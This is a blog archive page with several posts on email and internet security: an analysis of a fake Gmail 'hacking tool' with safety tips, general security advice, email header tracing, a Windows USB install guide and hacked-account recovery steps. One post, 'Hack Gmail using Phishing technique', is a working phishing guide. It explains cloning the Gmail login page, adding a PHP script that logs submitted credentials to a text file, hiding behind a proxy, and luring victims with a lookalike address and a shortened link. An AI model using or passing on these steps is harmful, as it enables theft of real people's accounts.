Showing posts with label Email. Show all posts
Showing posts with label Email. Show all posts

Monday, June 25, 2012

Gmail Hacking Apps...??? Beware.....


During the last few months we’ve seen quite a lot of do-it-yourself hacking tools such as the Twitter Botnet Creator or the nifty iStealer password collector. Today’s specialty is an alleged Gmail application designed to “hack other users’ accounts” – an offer too good to refuse, especially if you’re a jealous lover or a control freak.
Gmail Hacker Builder
The application we’re going to dissect is a .NET executable (Visual Basic .NET) which seems to be strikingly similar to the previously mentioned pieces of malware. A closer look at the code reveals that all three creations share the same origin, namely the leaked source code of iStealer. Other similarities include the presence of a bootstrap utility and a stub file that actually contains the payload.
As users pop the utility open, they are prompted to enter their e-mail address and the associated password, which will be used by the application to send them the victims’ passwords. Once the process is complete, a click on the Build button creates an executable file that needs to be distributed to the victim. This custom binary is in fact the stub.exe file with the entered credentials saved in the new file’s overlay.
The Gmail Hacker Builder application
Gmail Hacker Tool error - Google Mail Phishing
Google Custom Hacking Tool

The custom “hacking tool”
The custom Gmail creator is nothing but a phishing tool designed to lure users who’d like to find out their friends’ Gmail passwords into actually disclosing theirs. When run, the application will send the data entered in the outlined fields to the address specified in the Gmail Hacker Builder application. Since it can’t actually hack anything, the application will crash with an ambiguous error:
This kind of pre-created “hacking tools” are blindly thrown on file-sharing hubs and torrent portals in the hope that some unwary victims will actually pick them and try to use them against their friends. These tools are even advertised through how-to hack movies posted on popular video sharing services, along with download links to the bombed binary.
In order to stay safe, don’t forget the following ground rules:
  • Never accept and run so-called hacking tools via IM; the friend who’s sending them might set you up with a nice decoy.
  • Never download this kind of tools; they are useless and pose a huge security risk to your system. E-mail or IM service providers never save users’ passwords in plain text, but rely on various hashing algorithms (with or without “salting”) to ensure that the authentication is done one-way (no one can find out the password, even if they get the hash). Bottom line: these tools will NEVER work as advertised, but will surely snatch your account username and password, along with other damage they may inflict.
  • Never stop your antivirus if it prevents you from accessing a file. If you have any doubt about the alert being a false positive, submit it via the application’s support request system. It will be carefully inspected to see whether it is legit or not. Putting your shield to sleep may get your privacy blown.

Monday, June 11, 2012

How Does Internet Security Work?


  • The Internet, also known as the World Wide Web, allows individuals and businesses to share information and files with other computers. However, any computer that is connected to the Internet is exposed to many risks from other computer users. Even when you are not aware of it, your computer is receiving information from other computers. Some Internet security tasks are automatically performed by your operating system; others must be managed and monitored by the user to be effective.

Common Threats

  • Protecting your computer while using the Internet is a constant process. PC, Mac and other popular operating systems have some built in Internet security features such as firewalls that block unauthorized access to your computer. Internet browser settings can help protect your computer from popups, adware and malicious codes in JavaScript and ActiveX applications. In addition, many Internet ready computers have virus and spyware detection already installed. Coordinating and monitoring these security programs is up to the user.

Basic Defense

  • The first line of defense for dial-up, high speed and wireless Internet access is a firewall. When it is active, your computer will only allow connections from computers at trusted sources. Depending on your operating system, you can allow exceptions and add programs and websites. Virus and spyware protection software will help you safeguard your files and your operating system. Malicious computer users (hackers) insert viruses and spyware in html codes, text files and software programs. Once downloaded and activated, these programs can destroy files, copy passwords and damage software applications to the extent that your computer no longer functions.

Passwords and Privacy

  • Almost every website, forum and even your email program requires you to enter a password. For added security, do not use the same password repeatedly. Combine random letters and numbers for strong password security. Avoid giving your personal email address to every site that you visit. It is better to sign up on new sites with a disposable email address. Despite aggressive legislation and prosecution, spam is still a major problem for Internet users. Review every website's privacy policy before providing personal information including your home address.

Email Security

  • Pay particular attention to common email security threats. Do not open email file attachments from unknown sources because this tends to be a major source of viruses. Clicking on active links in emails can redirect your browser to sites that contain spyware, adware or worse. Phishing, phony emails from trusted sources that ask for personal and financial information, can lead to identity theft. In general, your bank or credit card will never email a request for you update your information.

Stay Secure

  • New Internet threats appear daily. Keeping your security software updated is essential to your security plan. Review the default Internet security settings and update settings for your operating system, browser, email program and all installed security software often. Schedule a daily or weekly time for your virus and spyware software to run and report your security status. If you are frequently finding that your computer has been invaded by spyware or viruses, upgrade your software or select stronger protection options.

Wednesday, June 6, 2012

Hack Gmail using Phishing technique..!!

This post will explain you how to create fake or phishing web page for gmail. This Procedure can be used to make fake page for other websites like yahoo,msn,or any other sites which you want to steal the password of particular user.

Steps for Creating Phishing or Fake web Page:

Step 1:
Go to the gmail.com.  Save the Page as "complet HTML" file

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"

Step3:
 Upload those image to tinypic or photobucker.com.  copy the url of each image.

Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .

Step 5: 
Search for the

 action="https://www.google.com/accounts/ServiceLoginAuth"

Replace it with 

action="http://yoursite urlhere/login.php"

 save the file.
Step6: 
Now you need to create login.php
 so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save it

Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.


Step 8: 
create an email with gmail keyword.
 like : gmailburger@gmail.com

Step 9:
  Send to victim similar  to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.



 Note:
For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.

Wednesday, May 2, 2012

How to trace your Email


Trace an email address in the most popular programs like Microsoft Outlook, Hotmail, Yahoo, Gmail, AOL, by finding the header

What is an email header?

Each email you receive comes with headers. The headers contain information about the routing of the message and the originating Internet Protocol address of the message. Not all electronic messeges you receive will allow you to track them back to the originating point and depending on how you send messages determines whether or not they can trace an email address back to you. The headers don't contain any personal information. At most, the results of the trace with show you the origination IP and the computer name that sent the email. After viewing the trace information, the initiating IP can be looked up to determine from where the message was sent. IP address location information DOES NOT contain your street name, house number, or phone number. The trace will most likely determine the city and the ISP the sender used.

How do I get the header to start the trace email process?

Each electronic messaging program will vary as to how you get to the message options. I'll cover the basics to start the trace...the rest is up to you.
  • Outlook - Right click the message while it's in the inbox and choose Message Options. A window will open with the headers in the bottom of the window.
  • Windows Live - Right click the correspondence while it's in the inbox, choose Properties, then click the Details tab.
  • GMail - Open the correspondence. In the upper right corner of the email you'll see the word Reply with a little down arrow to the right. Click the down arrow and choose Show Original.
  • Hotmail - Right click the memo and choose View Message Source.
  • Yahoo! - Right click the note and choose View Full Headers.
  • AOL - Click Action and then View Message Source.
You can see that no matter the program, the headers are usually just a right click away.

I've got the header, now how do I start the trace?

The next step to trace an email address is to find the first IP listed in the header. This is most likely the IP initiating point. However, there are exceptions to this. You'll have to look at the information logically to deduce the originating IP.

Can you trace any email address?

Yes and No. For example, someone who sends a message to your hotmail account shows in the X-Originating IP section of the headers. However, someone who sends you a message from GMail will ONLY trace back to Google IP addresses.

Wednesday, April 4, 2012

How to Install Windows 7 from USB Drive


 



Go to Start menu > All programs > Accessories, right click on Command Prompt and select Run as administrator
0 How to Install Windows 7 from USB Drive
Now type diskpart and press Enter
Next type Lis Disk command and note down the Disk number of your USB flash drive. Select disk 1
1 How to Install Windows 7 from USB Drive
Now you can use following commands step by step
clean 
create partition primary 
select partition 1 
active
format fs=ntfs 
assign 
exit
3 How to Install Windows 7 from USB Drive
Now insert your Windows7/Windows 8 DVD in your CD/DVD drive and check the drive letter of the DVD drive and note down the “drive letter” of your DVD drive. In my case, it is “j:” Now type the following list of commands as shown below:
J:  cd boot   (Where “j” is my DVD drive letter).
cd boot 
bootsect.exe /nt60 h:    (Where “h” is my USB drive letter) 
exit
4 How to Install Windows 7 from USB Drive
Copy your Windows 7 DVD contents to the USB flash drive.
Your USB drive is ready to boot and install Windows 7.

Sunday, October 31, 2010

How to Recover Hacked Email Accounts?

 It can be a real nightmare if someone hacks and takes control of your email account as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out. In this post you will find the possible ways and procedures to get back your hacked email account.

For Gmail:

Email Hacked?It can be a big disaster if your Gmail account has been compromised as it may be associated with several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.




Step -1: Try resetting your password since it is the easiest way to get your account back in action. In this process Google may ask you to answer the secret question or may send the password reset details to the secondary email address associated with your compromised account. You can reset you password from the following link
If you cannot find success from the Step-1 then proceed to Step-2.




Step-2: Many times the hacker will change the secret question and secondary email address right after the account is compromised. This is the reason for the Password Reset process to fail. If this is the case then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like




1. Email addresses of up to five frequently emailed contacts
2. Names of any 4 Labels that you may have created in your account
3. List of other services associated with your compromised account
4. Your last successful login date
5. Account created date
6. Last password that you remember and many more…





You need to fill out this form as much accurately as possible. It is obvious to forget the dates of last login, account creation and similar terms. However you need to figure out the closest possible date/answers and fill out this form. This is your last chance! The more accurate the information filled out in the recovery form, the more the chances of getting your account back. You may reach the account recovery page form the following link

 

For Yahoo and Hotmail:

Unfortunately for Yahoo/Hotmail there is no second option like filling out the form or contacting the support team. All you need to do is either answer the secret questions that you have setup or reset the password using the secondary email option. 
To initiate the password reset process just click on the Forgot password link in your login page and proceed as per the screen instructions.
I hope this post will help you recover the lost account. I highly recommend that you also read my post on How to protect your email account from being hacked and Tips to find unauthorized activity on your Gmail account so that you always stay protected!